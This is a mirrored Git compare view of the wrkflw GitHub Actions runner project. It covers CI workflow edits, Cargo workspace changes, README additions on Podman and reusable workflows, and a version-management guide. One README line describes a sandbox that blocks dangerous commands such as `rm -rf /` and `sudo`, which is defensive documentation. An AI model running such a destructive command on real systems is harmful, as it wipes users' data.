Mirror of https://github.com/bahdotsh/wrkflw.git, synced 2025-12-30 17:06:56 +01:00

Compare commits: bahdotsh/v ... wrkflw-git (57 commits)
Commits:

7970e6ad7d, 51a655f07b, 7ac18f3715, 1f3fee7373, f49ccd70d9, 5161882989, 5e9658c885, aa9da33b30, dff3697052, 5051f71b8b,
64b980d254, 2d809388a2, 03af6cb7c1, ae52779e11, fe7be3e1ae, 30f405ccb9, 1d56d86ba5, f1ca411281, 797e31e3d3, 4e66f65de7,
335886ac70, 8005cbb7ee, 5b216f59e6, 7a17d26589, 6efad9ce96, 064f7259d7, db1d4bcf48, 250a88ba94, cd56ce8506, 8fc6dcaa6c,
3f7bd30cca, 960f7486a2, cb936cd1af, 625b8111f1, b2b6e9e08d, 86660ae573, 886c415fa7, 460357d9fe, 096ccfa180, 8765537cfa,
ac708902ef, d1268d55cf, a146d94c35, 7636195380, 98afdb3372, 58de01e69f, 880cae3899, 66e540645d, 79b6389f54, 5d55812872,
537bf2f9d1, f0b6633cb8, 181b5c5463, 1cc3bf98b6, af8ac002e4, 50e62fbc1f, 30659ac5d6
16  .github/workflows/build.yml  (vendored)

@@ -3,7 +3,7 @@ name: Build
 on:
   workflow_dispatch:
   push:
-    branches: [ main ]
+    branches: [main]
   pull_request:

 jobs:
@@ -12,12 +12,14 @@ jobs:
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:
-        os: [ubuntu-latest, macos-latest]
+        os: [ubuntu-latest, macos-latest, windows-latest]
         include:
           - os: ubuntu-latest
             target: x86_64-unknown-linux-gnu
           - os: macos-latest
             target: x86_64-apple-darwin
+          - os: windows-latest
+            target: x86_64-pc-windows-msvc

     steps:
       - name: Checkout code
@@ -31,27 +33,27 @@ jobs:
           target: ${{ matrix.target }}
           override: true
           components: clippy, rustfmt

       - name: Check formatting
         uses: actions-rs/cargo@v1
         with:
           command: fmt
           args: -- --check

       - name: Run clippy
         uses: actions-rs/cargo@v1
         with:
           command: clippy
           args: -- -D warnings

       - name: Build
         uses: actions-rs/cargo@v1
         with:
           command: build
           args: --target ${{ matrix.target }}

       - name: Run tests
         uses: actions-rs/cargo@v1
         with:
           command: test
-          args: --target ${{ matrix.target }}
+          args: --target ${{ matrix.target }}
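Aside: with `windows-latest` joining the matrix above, the modified workflow can be sanity-checked locally using the tool this repository builds (the `validate` subcommand is documented in the README below):

```bash
# Structural validation of the updated workflow file
wrkflw validate .github/workflows/build.yml
```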
25  .github/workflows/release.yml  (vendored)

@@ -42,7 +42,30 @@ jobs:
           cargo install git-cliff --force

       - name: Generate Changelog
-        run: git-cliff --latest --output CHANGELOG.md
+        run: |
+          # Debug: Show current state
+          echo "Current ref: ${{ github.ref_name }}"
+          echo "Input version: ${{ github.event.inputs.version }}"
+          echo "All tags:"
+          git tag --sort=-version:refname | head -10
+
+          # Generate changelog from the current tag to the previous version tag
+          CURRENT_TAG="${{ github.event.inputs.version || github.ref_name }}"
+          PREVIOUS_TAG=$(git tag --sort=-version:refname | grep "^v" | head -2 | tail -1)
+
+          echo "Current tag: $CURRENT_TAG"
+          echo "Previous tag: $PREVIOUS_TAG"
+
+          if [ -n "$PREVIOUS_TAG" ] && [ "$PREVIOUS_TAG" != "$CURRENT_TAG" ]; then
+            echo "Generating changelog for range: $PREVIOUS_TAG..$CURRENT_TAG"
+            git-cliff --tag "$CURRENT_TAG" "$PREVIOUS_TAG..$CURRENT_TAG" --output CHANGELOG.md
+          else
+            echo "Generating latest changelog for tag: $CURRENT_TAG"
+            git-cliff --tag "$CURRENT_TAG" --latest --output CHANGELOG.md
+          fi
+
+          echo "Generated changelog:"
+          cat CHANGELOG.md

       - name: Create Release
         id: create_release
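Aside: the tag-range selection in the new step can be dry-run outside CI. A minimal sketch, assuming release tags are prefixed with "v" (the tag value here is a placeholder):

```bash
# Pick the second-newest v-prefixed tag as the previous release
CURRENT_TAG="v0.7.3"
PREVIOUS_TAG=$(git tag --sort=-version:refname | grep "^v" | head -2 | tail -1)
echo "git-cliff would cover: $PREVIOUS_TAG..$CURRENT_TAG"
```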
1748  Cargo.lock  (generated)

File diff suppressed because it is too large.
27  Cargo.toml

@@ -1,11 +1,9 @@
 [workspace]
-members = [
-    "crates/*"
-]
+members = ["crates/*"]
 resolver = "2"

 [workspace.package]
-version = "0.4.0"
+version = "0.7.3"
 edition = "2021"
 description = "A GitHub Actions workflow validator and executor"
 documentation = "https://github.com/bahdotsh/wrkflw"
@@ -16,6 +14,22 @@ categories = ["command-line-utilities"]
 license = "MIT"

 [workspace.dependencies]
+# Internal crate dependencies
+wrkflw-models = { path = "crates/models", version = "0.7.2" }
+wrkflw-evaluator = { path = "crates/evaluator", version = "0.7.2" }
+wrkflw-executor = { path = "crates/executor", version = "0.7.2" }
+wrkflw-github = { path = "crates/github", version = "0.7.2" }
+wrkflw-gitlab = { path = "crates/gitlab", version = "0.7.2" }
+wrkflw-logging = { path = "crates/logging", version = "0.7.2" }
+wrkflw-matrix = { path = "crates/matrix", version = "0.7.2" }
+wrkflw-parser = { path = "crates/parser", version = "0.7.2" }
+wrkflw-runtime = { path = "crates/runtime", version = "0.7.2" }
+wrkflw-secrets = { path = "crates/secrets", version = "0.7.2" }
+wrkflw-ui = { path = "crates/ui", version = "0.7.2" }
+wrkflw-utils = { path = "crates/utils", version = "0.7.2" }
+wrkflw-validators = { path = "crates/validators", version = "0.7.2" }
+
+# External dependencies
 clap = { version = "4.3", features = ["derive"] }
 colored = "2.0"
 serde = { version = "1.0", features = ["derive"] }
@@ -44,7 +58,10 @@ rayon = "1.7.0"
 num_cpus = "1.16.0"
 regex = "1.10"
 lazy_static = "1.4"
-reqwest = { version = "0.11", features = ["json"] }
+reqwest = { version = "0.11", default-features = false, features = [
+    "rustls-tls",
+    "json",
+] }
 libc = "0.2"
 nix = { version = "0.27.1", features = ["fs"] }
 urlencoding = "2.1.3"
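Aside: the reqwest change above disables default features and opts into rustls, which drops the OpenSSL-backed TLS stack from the build. A hedged way to confirm that after rebuilding (cargo tree exits non-zero when the package is absent from the graph):

```bash
# If the switch worked, openssl-sys should no longer appear anywhere
cargo tree -i openssl-sys || echo "openssl-sys is gone from the dependency graph"
```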
181  README.md

@@ -14,22 +14,58 @@ WRKFLW is a powerful command-line tool for validating and executing GitHub Actio
 - **TUI Interface**: A full-featured terminal user interface for managing and monitoring workflow executions
 - **Validate Workflow Files**: Check for syntax errors and common mistakes in GitHub Actions workflow files with proper exit codes for CI/CD integration
-- **Execute Workflows Locally**: Run workflows directly on your machine using Docker containers
-- **Emulation Mode**: Optional execution without Docker by emulating the container environment locally
+- **Execute Workflows Locally**: Run workflows directly on your machine using Docker or Podman containers
+- **Multiple Container Runtimes**: Support for Docker, Podman, and emulation mode for maximum flexibility
 - **Job Dependency Resolution**: Automatically determines the correct execution order based on job dependencies
-- **Docker Integration**: Execute workflow steps in isolated Docker containers with proper environment setup
+- **Container Integration**: Execute workflow steps in isolated containers with proper environment setup
 - **GitHub Context**: Provides GitHub-like environment variables and workflow commands
-- **Multiple Runtime Modes**: Choose between Docker containers or local emulation for maximum flexibility
+- **Rootless Execution**: Podman support enables running containers without root privileges
 - **Action Support**: Supports various GitHub Actions types:
   - Docker container actions
   - JavaScript actions
   - Composite actions
   - Local actions
 - **Special Action Handling**: Native handling for commonly used actions like `actions/checkout`
+- **Reusable Workflows (Caller Jobs)**: Execute jobs that call reusable workflows via `jobs.<id>.uses` (local path or `owner/repo/path@ref`)
 - **Output Capturing**: View logs, step outputs, and execution details
 - **Parallel Job Execution**: Runs independent jobs in parallel for faster workflow execution
 - **Trigger Workflows Remotely**: Manually trigger workflow runs on GitHub or GitLab

+## Requirements
+
+### Container Runtime (Optional)
+
+WRKFLW supports multiple container runtimes for isolated execution:
+
+- **Docker**: The default container runtime. Install from [docker.com](https://docker.com)
+- **Podman**: A rootless container runtime. Perfect for environments where Docker isn't available or permitted. Install from [podman.io](https://podman.io)
+- **Emulation**: No container runtime required. Executes commands directly on the host system
+
+### Podman Support
+
+Podman is particularly useful in environments where:
+- Docker installation is not permitted by your organization
+- Root privileges are not available for Docker daemon
+- You prefer rootless container execution
+- Enhanced security through daemonless architecture is desired
+
+To use Podman:
+```bash
+# Install Podman (varies by OS)
+# On macOS with Homebrew:
+brew install podman
+
+# On Ubuntu/Debian:
+sudo apt-get install podman
+
+# Initialize Podman machine (macOS/Windows)
+podman machine init
+podman machine start
+
+# Use with wrkflw
+wrkflw run --runtime podman .github/workflows/ci.yml
+```
+
 ## Installation

 The recommended way to install `wrkflw` is using Rust's package manager, Cargo:
@@ -75,6 +111,12 @@ wrkflw validate path/to/workflow.yml
 # Validate workflows in a specific directory
 wrkflw validate path/to/workflows

+# Validate multiple files and/or directories (GitHub and GitLab are auto-detected)
+wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
+
+# Force GitLab parsing for all provided paths
+wrkflw validate --gitlab .gitlab-ci.yml other.gitlab-ci.yml
+
 # Validate with verbose output
 wrkflw validate --verbose path/to/workflow.yml

@@ -115,8 +157,11 @@ fi
 # Run a workflow with Docker (default)
 wrkflw run .github/workflows/ci.yml

-# Run a workflow in emulation mode (without Docker)
-wrkflw run --emulate .github/workflows/ci.yml
+# Run a workflow with Podman instead of Docker
+wrkflw run --runtime podman .github/workflows/ci.yml
+
+# Run a workflow in emulation mode (without containers)
+wrkflw run --runtime emulation .github/workflows/ci.yml

 # Run with verbose output
 wrkflw run --verbose .github/workflows/ci.yml
@@ -137,8 +182,11 @@ wrkflw tui path/to/workflows
 # Open TUI with a specific workflow pre-selected
 wrkflw tui path/to/workflow.yml

+# Open TUI with Podman runtime
+wrkflw tui --runtime podman
+
 # Open TUI in emulation mode
-wrkflw tui --emulate
+wrkflw tui --runtime emulation
 ```

 ### Triggering Workflows Remotely
@@ -162,7 +210,7 @@ The terminal user interface provides an interactive way to manage workflows:
 - **r**: Run all selected workflows
 - **a**: Select all workflows
 - **n**: Deselect all workflows
-- **e**: Toggle between Docker and Emulation mode
+- **e**: Cycle through runtime modes (Docker → Podman → Emulation)
 - **v**: Toggle between Execution and Validation mode
 - **Esc**: Back / Exit detailed view
 - **q**: Quit application
@@ -225,20 +273,22 @@ $ wrkflw
 # This will automatically load .github/workflows files into the TUI
 ```

-## Requirements
+## System Requirements

 - Rust 1.67 or later
-- Docker (optional, for container-based execution)
-- When not using Docker, the emulation mode can run workflows using your local system tools
+- Container Runtime (optional, for container-based execution):
+  - **Docker**: Traditional container runtime
+  - **Podman**: Rootless alternative to Docker
+  - **None**: Emulation mode runs workflows using local system tools

 ## How It Works

-WRKFLW parses your GitHub Actions workflow files and executes each job and step in the correct order. For Docker mode, it creates containers that closely match GitHub's runner environments. The workflow execution process:
+WRKFLW parses your GitHub Actions workflow files and executes each job and step in the correct order. For container modes (Docker/Podman), it creates containers that closely match GitHub's runner environments. The workflow execution process:

 1. **Parsing**: Reads and validates the workflow YAML structure
 2. **Dependency Resolution**: Creates an execution plan based on job dependencies
 3. **Environment Setup**: Prepares GitHub-like environment variables and context
-4. **Execution**: Runs each job and step either in Docker containers or through local emulation
+4. **Execution**: Runs each job and step either in containers (Docker/Podman) or through local emulation
 5. **Monitoring**: Tracks progress and captures outputs in the TUI or command line

 ## Advanced Features
@@ -262,7 +312,7 @@ WRKFLW supports composite actions, which are actions made up of multiple steps.

 ### Container Cleanup

-WRKFLW automatically cleans up any Docker containers created during workflow execution, even if the process is interrupted with Ctrl+C.
+WRKFLW automatically cleans up any containers created during workflow execution (Docker/Podman), even if the process is interrupted with Ctrl+C.

 For debugging failed workflows, you can preserve containers that fail by using the `--preserve-containers-on-failure` flag:

@@ -277,10 +327,46 @@ wrkflw tui --preserve-containers-on-failure
 When a container fails with this flag enabled, WRKFLW will:
 - Keep the failed container running instead of removing it
 - Log the container ID and provide inspection instructions
-- Show a message like: `Preserving container abc123 for debugging (exit code: 1). Use 'docker exec -it abc123 bash' to inspect.`
+- Show a message like: `Preserving container abc123 for debugging (exit code: 1). Use 'docker exec -it abc123 bash' to inspect.` (Docker)
+- Or: `Preserving container abc123 for debugging (exit code: 1). Use 'podman exec -it abc123 bash' to inspect.` (Podman)

 This allows you to inspect the exact state of the container when the failure occurred, examine files, check environment variables, and debug issues more effectively.

+### Podman-Specific Features
+
+When using Podman as the container runtime, you get additional benefits:
+
+**Rootless Operation:**
+```bash
+# Run workflows without root privileges
+wrkflw run --runtime podman .github/workflows/ci.yml
+```
+
+**Enhanced Security:**
+- Daemonless architecture reduces attack surface
+- User namespaces provide additional isolation
+- No privileged daemon required
+
+**Container Inspection:**
+```bash
+# List preserved containers
+podman ps -a --filter "name=wrkflw-"
+
+# Inspect a preserved container's filesystem (without executing)
+podman mount <container-id>
+
+# Or run a new container with the same volumes
+podman run --rm -it --volumes-from <failed-container> ubuntu:20.04 bash
+
+# Clean up all wrkflw containers
+podman ps -a --filter "name=wrkflw-" --format "{{.Names}}" | xargs podman rm -f
+```
+
+**Compatibility:**
+- Drop-in replacement for Docker workflows
+- Same CLI options and behavior
+- Identical container execution environment
+
 ## Limitations

 ### Supported Features
@@ -288,11 +374,12 @@ This allows you to inspect the exact state of the container when the failure occ
 - ✅ Job dependency resolution and parallel execution (all jobs with correct 'needs' relationships are executed in the right order, and independent jobs run in parallel)
 - ✅ Matrix builds (supported for reasonable matrix sizes; very large matrices may be slow or resource-intensive)
 - ✅ Environment variables and GitHub context (all standard GitHub Actions environment variables and context objects are emulated)
-- ✅ Docker container actions (all actions that use Docker containers are supported in Docker mode)
+- ✅ Container actions (all actions that use containers are supported in Docker and Podman modes)
 - ✅ JavaScript actions (all actions that use JavaScript are supported)
 - ✅ Composite actions (all composite actions, including nested and local composite actions, are supported)
 - ✅ Local actions (actions referenced with local paths are supported)
 - ✅ Special handling for common actions (e.g., `actions/checkout` is natively supported)
+- ✅ Reusable workflows (caller): Jobs that use `jobs.<id>.uses` to call local or remote workflows are executed; inputs and secrets are propagated to the called workflow
 - ✅ Workflow triggering via `workflow_dispatch` (manual triggering of workflows is supported)
 - ✅ GitLab pipeline triggering (manual triggering of GitLab pipelines is supported)
 - ✅ Environment files (`GITHUB_OUTPUT`, `GITHUB_ENV`, `GITHUB_PATH`, `GITHUB_STEP_SUMMARY` are fully supported)
@@ -303,35 +390,81 @@ This allows you to inspect the exact state of the container when the failure occ

 ### Limited or Unsupported Features (Explicit List)
 - ❌ GitHub secrets and permissions: Only basic environment variables are supported. GitHub's encrypted secrets and fine-grained permissions are NOT available.
-- ❌ GitHub Actions cache: Caching functionality (e.g., `actions/cache`) is NOT supported in emulation mode and only partially supported in Docker mode (no persistent cache between runs).
+- ❌ GitHub Actions cache: Caching functionality (e.g., `actions/cache`) is NOT supported in emulation mode and only partially supported in Docker and Podman modes (no persistent cache between runs).
 - ❌ GitHub API integrations: Only basic workflow triggering is supported. Features like workflow status reporting, artifact upload/download, and API-based job control are NOT available.
 - ❌ GitHub-specific environment variables: Some advanced or dynamic environment variables (e.g., those set by GitHub runners or by the GitHub API) are emulated with static or best-effort values, but not all are fully functional.
 - ❌ Large/complex matrix builds: Very large matrices (hundreds or thousands of job combinations) may not be practical due to performance and resource limits.
-- ❌ Network-isolated actions: Actions that require strict network isolation or custom network configuration may not work out-of-the-box and may require manual Docker configuration.
+- ❌ Network-isolated actions: Actions that require strict network isolation or custom network configuration may not work out-of-the-box and may require manual container runtime configuration.
 - ❌ Some event triggers: Only `workflow_dispatch` (manual trigger) is fully supported. Other triggers (e.g., `push`, `pull_request`, `schedule`, `release`, etc.) are NOT supported.
 - ❌ GitHub runner-specific features: Features that depend on the exact GitHub-hosted runner environment (e.g., pre-installed tools, runner labels, or hardware) are NOT guaranteed to match. Only a best-effort emulation is provided.
 - ❌ Windows and macOS runners: Only Linux-based runners are fully supported. Windows and macOS jobs are NOT supported.
-- ❌ Service containers: Service containers (e.g., databases defined in `services:`) are only supported in Docker mode. In emulation mode, they are NOT supported.
+- ❌ Service containers: Service containers (e.g., databases defined in `services:`) are only supported in Docker and Podman modes. In emulation mode, they are NOT supported.
 - ❌ Artifacts: Uploading and downloading artifacts between jobs/steps is NOT supported.
 - ❌ Job/step timeouts: Custom timeouts for jobs and steps are NOT enforced.
 - ❌ Job/step concurrency and cancellation: Features like `concurrency` and job cancellation are NOT supported.
 - ❌ Expressions and advanced YAML features: Most common expressions are supported, but some advanced or edge-case expressions may not be fully implemented.
+- ⚠️ Reusable workflows (limits):
+  - Outputs from called workflows are not propagated back to the caller (`needs.<id>.outputs.*` not supported)
+  - `secrets: inherit` is not special-cased; provide a mapping to pass secrets
+  - Remote calls clone public repos via HTTPS; private repos require preconfigured access (not yet implemented)
+  - Deeply nested reusable calls work but lack cycle detection beyond regular job dependency checks
+
+## Reusable Workflows
+
+WRKFLW supports executing reusable workflow caller jobs.
+
+### Syntax
+
+```yaml
+jobs:
+  call-local:
+    uses: ./.github/workflows/shared.yml
+
+  call-remote:
+    uses: my-org/my-repo/.github/workflows/shared.yml@v1
+    with:
+      foo: bar
+    secrets:
+      token: ${{ secrets.MY_TOKEN }}
+```
+
+### Behavior
+- Local references are resolved relative to the current working directory.
+- Remote references are shallow-cloned at the specified `@ref` into a temporary directory.
+- `with:` entries are exposed to the called workflow as environment variables `INPUT_<KEY>` (see the sketch after this list).
+- `secrets:` mapping entries are exposed as environment variables `SECRET_<KEY>`.
+- The called workflow executes according to its own `jobs`/`needs`; a summary of its job results is reported as a single result for the caller job.
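Aside: a hypothetical step inside `shared.yml` consuming the mapping above could look like this, assuming keys are uppercased as the `INPUT_<KEY>`/`SECRET_<KEY>` patterns suggest:

```bash
# Hypothetical step body in the called workflow
echo "foo was passed as: $INPUT_FOO"
echo "token length: ${#SECRET_TOKEN}"   # print only the length, never the secret itself
```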
+### Current limitations
+- Outputs from called workflows are not surfaced back to the caller.
+- `secrets: inherit` is not supported; specify an explicit mapping.
+- Private repositories for remote `uses:` are not yet supported.

 ### Runtime Mode Differences
 - **Docker Mode**: Provides the closest match to GitHub's environment, including support for Docker container actions, service containers, and Linux-based jobs. Some advanced container configurations may still require manual setup.
-- **Emulation Mode**: Runs workflows using the local system tools. Limitations:
+- **Podman Mode**: Similar to Docker mode but uses Podman for container execution. Offers rootless container support and enhanced security. Fully compatible with Docker-based workflows.
+- **🔒 Secure Emulation Mode**: Runs workflows on the local system with comprehensive sandboxing for security. **Recommended for local development**:
+  - Command validation and filtering (blocks dangerous commands like `rm -rf /`, `sudo`, etc.)
+  - Resource limits (CPU, memory, execution time)
+  - Filesystem access controls
+  - Process monitoring and limits
+  - Safe for running untrusted workflows locally
+- **⚠️ Emulation Mode (Legacy)**: Runs workflows using local system tools without sandboxing. **Not recommended - use Secure Emulation instead**:
   - Only supports local and JavaScript actions (no Docker container actions)
   - No support for service containers
   - No caching support
+  - **No security protections - can execute harmful commands**
   - Some actions may require adaptation to work locally
   - Special action handling is more limited

 ### Best Practices
-- Test workflows in both Docker and emulation modes to ensure compatibility
+- **Use Secure Emulation mode for local development** - provides safety without container overhead
+- Test workflows in multiple runtime modes to ensure compatibility
+- **Use Docker/Podman mode for production** - provides maximum isolation and reproducibility
 - Keep matrix builds reasonably sized for better performance
 - Use environment variables instead of GitHub secrets when possible
 - Consider using local actions for complex custom functionality
 - Test network-dependent actions carefully in both modes
+- **Review security warnings** - pay attention to blocked commands in secure emulation mode
+- **Start with secure mode** - only fall back to legacy emulation if necessary

 ## Roadmap

@@ -373,7 +506,7 @@ The following roadmap outlines our planned approach to implementing currently un
 ### 6. Network-Isolated Actions
 - **Goal:** Support custom network configurations and strict isolation for actions.
 - **Plan:**
-  - Add advanced Docker network configuration options.
+  - Add advanced container network configuration options for Docker and Podman.
   - Document best practices for network isolation.

 ### 7. Event Triggers
279  VERSION_MANAGEMENT.md  (new file)

@@ -0,0 +1,279 @@
# Version Management Guide

This guide explains how to manage versions in the wrkflw workspace, both for the entire workspace and for individual crates.

## Overview

The wrkflw project uses a Cargo workspace with flexible version management that supports:
- **Workspace-wide versioning**: All crates share the same version
- **Individual crate versioning**: Specific crates can have their own versions
- **Automatic dependency management**: Internal dependencies are managed through workspace inheritance

## Current Setup

### Workspace Dependencies
All internal crate dependencies are defined in the root `Cargo.toml` under `[workspace.dependencies]`:

```toml
[workspace.dependencies]
# Internal crate dependencies
wrkflw-models = { path = "crates/models", version = "0.7.2" }
wrkflw-evaluator = { path = "crates/evaluator", version = "0.7.2" }
# ... other crates
```
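Each internal dependency deliberately carries both a `path` and a `version`: Cargo uses the `path` when building inside the workspace, while the `version` is what gets written into a crate's metadata when it is published to crates.io.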
### Crate Dependencies
Individual crates reference internal dependencies using workspace inheritance:

```toml
[dependencies]
# Internal crates
wrkflw-models.workspace = true
wrkflw-validators.workspace = true
```

This approach means:
- ✅ No hard-coded versions in individual crates
- ✅ Single source of truth for internal crate versions
- ✅ Easy individual crate versioning without manual updates everywhere

## Version Management Strategies

### Strategy 1: Workspace-Wide Versioning (Recommended for most cases)

Use this when changes affect multiple crates or for major releases.
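The `cargo ws` subcommand used below is provided by the cargo-workspaces plugin; install it once if it is missing:

```bash
cargo install cargo-workspaces
```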
```bash
# Bump all crates to the same version
cargo ws version patch   # 0.7.2 → 0.7.3
cargo ws version minor   # 0.7.2 → 0.8.0
cargo ws version major   # 0.7.2 → 1.0.0

# Or specify an exact version
cargo ws version 1.0.0

# Commit and tag
git add .
git commit -m "chore: bump workspace version to $(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')"
git tag v$(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')
git push origin main --tags
```

### Strategy 2: Individual Crate Versioning

Use this when changes are isolated to specific crates.

#### Using the Helper Script

```bash
# Bump a specific crate
./scripts/bump-crate.sh wrkflw-models patch   # 0.7.2 → 0.7.3
./scripts/bump-crate.sh wrkflw-models minor   # 0.7.2 → 0.8.0
./scripts/bump-crate.sh wrkflw-models 0.8.5   # Specific version

# The script will:
# 1. Update the crate's Cargo.toml to use an explicit version
# 2. Update workspace dependencies
# 3. Show you next steps
```

#### Manual Individual Versioning

If you prefer manual control:

1. **Update the crate's Cargo.toml**:
   ```toml
   # Change from:
   version.workspace = true
   # To:
   version = "0.7.3"
   ```

2. **Update workspace dependencies**:
   ```toml
   [workspace.dependencies]
   wrkflw-models = { path = "crates/models", version = "0.7.3" }
   ```

3. **Test and commit**:
   ```bash
   cargo check
   git add .
   git commit -m "bump: wrkflw-models to 0.7.3"
   git tag v0.7.3-wrkflw-models
   git push origin main --tags
   ```

## Release Workflows

### Full Workspace Release

```bash
# 1. Make your changes
# 2. Bump the version
cargo ws version patch --no-git-commit

# 3. Commit and tag
git add .
git commit -m "chore: release version $(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')"
git tag v$(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')

# 4. Push (this triggers GitHub Actions)
git push origin main --tags
```

### Individual Crate Release

```bash
# 1. Use the helper script or the manual method above
./scripts/bump-crate.sh wrkflw-models patch

# 2. Follow the script's suggestions
git add .
git commit -m "bump: wrkflw-models to X.Y.Z"
git tag vX.Y.Z-wrkflw-models
git push origin main --tags

# 3. Optionally publish to crates.io
cd crates/models
cargo publish
```

## Publishing to crates.io

### Publishing Individual Crates

```bash
# Navigate to the crate
cd crates/models

# Ensure all dependencies are published first
# (or available on crates.io)
cargo publish --dry-run

# Publish
cargo publish
```

### Publishing All Crates

```bash
# Use cargo-workspaces
cargo ws publish --from-git
```

## Integration with GitHub Actions

The existing `.github/workflows/release.yml` works with both strategies:

- **Tag format `v1.2.3`**: Triggers a full workspace release
- **Tag format `v1.2.3-crate-name`**: Could be used for individual crate releases (needs workflow modification)

### Modifying for Individual Crate Releases

To support individual crate releases, you could modify the workflow to:

```yaml
on:
  push:
    tags:
      - 'v*'          # Full releases: v1.2.3
      - 'v*-wrkflw-*' # Individual releases: v1.2.3-wrkflw-models
```

## Best Practices

### When to Use Each Strategy

**Use Workspace-Wide Versioning when:**
- Making breaking changes across multiple crates
- Major feature releases
- Initial development phases
- Simpler release management is preferred

**Use Individual Crate Versioning when:**
- Changes are isolated to specific functionality
- Different crates have different stability levels
- You want to minimize dependency updates for users
- Publishing to crates.io with different release cadences

### Version Numbering

Follow [Semantic Versioning](https://semver.org/):

- **Patch (0.7.2 → 0.7.3)**: Bug fixes, internal improvements
- **Minor (0.7.2 → 0.8.0)**: New features, backward compatible
- **Major (0.7.2 → 1.0.0)**: Breaking changes

### Dependency Management

- Keep internal dependencies on workspace inheritance
- Only specify explicit versions when a crate diverges from the workspace version
- Always test with `cargo check` and `cargo test` before releasing
- Use `cargo tree` to verify dependency resolution

## Troubleshooting

### Common Issues

**Issue**: Cargo complains about version mismatches
```bash
# Solution: Check that workspace dependencies match crate versions
grep -r "version.*=" crates/*/Cargo.toml
grep "wrkflw-.*version" Cargo.toml
```

**Issue**: A published crate can't find its dependencies
```bash
# Solution: Ensure all dependencies are published to crates.io first,
# or use path dependencies only for local development
```

**Issue**: GitHub Actions fails on a tag
```bash
# Solution: Ensure the tag format matches the workflow trigger
git tag -d v1.2.3                  # Delete the local tag
git push origin :refs/tags/v1.2.3  # Delete the remote tag
git tag v1.2.3                     # Recreate with the correct format
git push origin v1.2.3
```

## Tools and Commands

### Useful Commands

```bash
# List all workspace members with versions
cargo ws list

# Check all crates
cargo check --workspace

# Test all crates
cargo test --workspace

# Show the dependency tree
cargo tree

# Show outdated dependencies
cargo outdated

# Verify publishability
cargo publish --dry-run --manifest-path crates/models/Cargo.toml
```

### Recommended Tools

- `cargo-workspaces`: Workspace management
- `cargo-outdated`: Check for outdated dependencies
- `cargo-audit`: Security audit
- `cargo-machete`: Find unused dependencies

## Migration Notes

If you're migrating from the old hard-coded version system:

1. All internal crate versions are now managed in the workspace `Cargo.toml`
2. Individual crates use `crate-name.workspace = true` for internal dependencies
3. Use the helper script or the manual process above for individual versioning
4. The system is fully backward compatible with existing workflows
12  clippy-test.yml  (new file)

@@ -0,0 +1,12 @@
name: Clippy Test
on: [push]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Test secrets after clippy fixes
        env:
          TEST_VAR: ${{ secrets.TEST_SECRET }}
        run: |
          echo "Secret length: ${#TEST_VAR}"
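Aside: `${#TEST_VAR}` is ordinary Bash length expansion, so the step reports how long the secret is without printing its value. The same idiom, checked locally with a stand-in value:

```bash
TEST_VAR='hunter2'                    # stand-in; in CI it comes from secrets.TEST_SECRET
echo "Secret length: ${#TEST_VAR}"    # prints: Secret length: 7
```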
crates/evaluator/Cargo.toml

@@ -1,15 +1,20 @@
 [package]
-name = "evaluator"
+name = "wrkflw-evaluator"
 version.workspace = true
 edition.workspace = true
-description = "Workflow evaluation for wrkflw"
+description = "Workflow evaluation functionality for wrkflw execution engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 # Internal crates
-models = { path = "../models" }
-validators = { path = "../validators" }
+wrkflw-models.workspace = true
+wrkflw-validators.workspace = true

 # External dependencies
 colored.workspace = true
-serde_yaml.workspace = true
+serde_yaml.workspace = true
29  crates/evaluator/README.md  (new file)

@@ -0,0 +1,29 @@
## wrkflw-evaluator

Small, focused helper for statically evaluating GitHub Actions workflow files.

- **Purpose**: Fast structural checks (e.g., `name`, `on`, `jobs`) before deeper validation/execution
- **Used by**: `wrkflw` CLI and TUI during validation flows

### Example

```rust
use std::path::Path;

let result = wrkflw_evaluator::evaluate_workflow_file(
    Path::new(".github/workflows/ci.yml"),
    /* verbose */ true,
).expect("evaluation failed");

if result.is_valid {
    println!("Workflow looks structurally sound");
} else {
    for issue in result.issues {
        println!("- {}", issue);
    }
}
```

### Notes
- This crate focuses on structural checks; deeper rules live in `wrkflw-validators`.
- Most consumers should prefer the top-level `wrkflw` CLI for end-to-end UX.
crates/evaluator/src/lib.rs

@@ -3,8 +3,8 @@ use serde_yaml::{self, Value};
 use std::fs;
 use std::path::Path;

-use models::ValidationResult;
-use validators::{validate_jobs, validate_triggers};
+use wrkflw_models::ValidationResult;
+use wrkflw_validators::{validate_jobs, validate_triggers};

 pub fn evaluate_workflow_file(path: &Path, verbose: bool) -> Result<ValidationResult, String> {
     let content = fs::read_to_string(path).map_err(|e| format!("Failed to read file: {}", e))?;
@@ -21,26 +21,9 @@ pub fn evaluate_workflow_file(path: &Path, verbose: bool) -> Result<ValidationRe
         return Ok(result);
     }

-    // Check if name exists
-    if workflow.get("name").is_none() {
-        // Check if this might be a reusable workflow caller before reporting missing name
-        let has_reusable_workflow_job = if let Some(Value::Mapping(jobs)) = workflow.get("jobs") {
-            jobs.values().any(|job| {
-                if let Some(job_config) = job.as_mapping() {
-                    job_config.contains_key(Value::String("uses".to_string()))
-                } else {
-                    false
-                }
-            })
-        } else {
-            false
-        };
-
-        // Only report missing name if it's not a workflow with reusable workflow jobs
-        if !has_reusable_workflow_job {
-            result.add_issue("Workflow is missing a name".to_string());
-        }
-    }
+    // Note: The 'name' field is optional per GitHub Actions specification.
+    // When omitted, GitHub displays the workflow file path relative to the repository root.
+    // We do not validate name presence as it's not required by the schema.

     // Check if jobs section exists
     match workflow.get("jobs") {
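Aside: with the check removed, a workflow that omits the top-level `name:` should evaluate cleanly. A quick end-to-end sketch using a hypothetical scratch file:

```bash
# Minimal nameless workflow; structural evaluation no longer flags it
cat > /tmp/nameless.yml <<'EOF'
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo hello
EOF
wrkflw validate /tmp/nameless.yml
```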
crates/executor/Cargo.toml

@@ -1,18 +1,24 @@
 [package]
-name = "executor"
+name = "wrkflw-executor"
 version.workspace = true
